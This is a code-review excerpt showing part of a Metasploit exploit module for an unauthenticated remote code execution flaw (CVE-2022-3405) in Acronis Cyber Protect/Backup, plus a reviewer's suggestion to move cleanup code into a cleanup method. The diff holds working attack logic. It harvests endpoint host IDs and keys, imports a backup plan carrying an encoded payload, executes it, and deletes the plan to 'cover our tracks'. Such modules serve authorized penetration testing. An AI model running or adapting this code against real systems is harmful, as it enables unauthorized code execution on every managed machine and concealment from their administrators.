modules/exploits/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405.rb

```diff
@@ -0,0 +1,615 @@
+    when '12.5'
+      print_good("Acronis Cyber Protect/Backup #{version} - VULNERABLE") if Rex::Version.new(version) < Rex::Version.new('12.5.16545')
+    else
+      print_status("Acronis Cyber Protect/Backup #{version}")
+    end
+
+    # if hostid, parentid and key are blank, fetch the first managed online endpoint defined at the appliance matching the module target setting
+    hostid = datastore['HOSTID']
+    parentid = datastore['PARENTID']
+    key = datastore['KEY']
+    if hostid.blank? || parentid.blank? || key.blank?
+      print_status('Retrieve first online target registered at the Acronis Cyber Protect/Backup appliance.')
+      res_json = get_machine_info
+      fail_with(Failure::NotFound, 'Can not find any configuration information.') if res_json.nil?
+
+      # find first online target matching the module target settings
+      res_json['data'].each do |item|
+        next unless item['type'] == 'machine' && (item['osType'] == 'linux' && target['Type'] == :unix_cmd) || (item['osType'] == 'windows' && target['Type'] == :win_cmd) && item['online']
+
+        print_status("Found online target matching your target setting #{target.name}.")
+        print_good("hostId: #{item['hostId']}") unless item['hostId'].nil?
+        print_good("parentId: #{item['parentId']}") unless item['parentId'].nil?
+        print_good("key: #{item['id']}") unless item['id'].nil?
+        print_status("type: #{item['type']}") unless item['type'].nil?
+        print_status("hostname: #{item['title']}") unless item['title'].nil?
+        print_status("IP: #{item.dig('ip', 0)}") unless item.dig('ip', 0).nil?
+        print_status("OS: #{item['os']}") unless item['os'].nil?
+        print_status("ARCH: #{item['osType']}") unless item['osType'].nil?
+        print_status("ONLINE: #{item['online']}") unless item['online'].nil?
+        hostid = item['hostId']
+        parentid = item['parentId']
+        key = item['id']
+        break
+      end
+    end
+    fail_with(Failure::NotFound, "No target availabe matching your target setting #{target.name}.") if hostid.blank? || parentid.blank? || key.blank?
+
+    # create and import backup plan with payload
+    print_status("Import backup plan with payload for target with hostId: #{hostid}.")
+    @planid = create_and_import_backup_plan(hostid, parentid, key, payload.encoded)
+    fail_with(Failure::BadConfig, 'Importing backup plan with payload failed.') if @planid.nil?
+
+    print_status("Executing #{target.name} with payload #{datastore['PAYLOAD']}")
+    case target['Type']
+    when :unix_cmd, :win_cmd
+      execute_command
+    end
+
+    # try to remove imported backup plan with payload to cover our tracks
+    sleep(datastore['WfsDelay'])
+    if remove_backup_plan
+      print_good('Backup plan is successful removed.')
+    else
+      print_warning('Backup plan could not be removed. Try to clean it manually.')
+    end
```

Comment:
I think these lines can be moved to a `cleanup` implementation

```ruby
def cleanup
  super
  # ... your cleanup code here...
end
```

Which should get triggered after WfsDelay